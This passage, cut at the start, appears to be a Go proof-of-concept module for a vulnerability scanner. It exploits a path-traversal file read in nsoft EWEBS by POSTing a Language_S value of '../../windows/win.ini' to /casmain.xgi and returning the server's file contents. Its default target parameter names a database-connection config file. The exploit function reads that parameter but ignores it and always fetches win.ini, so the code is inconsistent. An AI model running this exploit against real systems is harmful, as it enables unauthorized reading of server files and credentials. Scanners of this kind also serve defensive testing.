File read
", "Recommendation": "Update", "References": [ "http://wiki.peiqi.tech" ], "HasExp": true, "ExpParams": [ { "name": "File", "type": "input", "value": "../../Data/CONFIG/CasDbCnn.dat" } ], "ScanSteps": [ "AND" ], "ExploitSteps": null, "Tags": [ "File read" ], "CVEIDs": null, "CVSSScore": "0.0", "AttackSurfaces": { "Application": [ "nsoft EWEBS" ], "Support": null, "Service": null, "System": null, "Hardware": null }, "Recommandation": "undefined
" }` ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { uri := "/casmain.xgi" cfg := httpclient.NewPostRequestConfig(uri) cfg.VerifyTls = false cfg.FollowRedirect = false cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") cfg.Data = "Language_S=../../../../../../../windows/win.ini" if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "for 16-bit app support") } return false }, func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { file := ss.Params["File"].(string) uri := "/casmain.xgi" cfg := httpclient.NewPostRequestConfig(uri) cfg.VerifyTls = false cfg.FollowRedirect = false cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") cfg.Data = "Language_S=../../../../../../../windows/win.ini" if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { if resp.StatusCode == 200 { expResult.Output = resp.RawBody expResult.Success = true } } return expResult }, )) }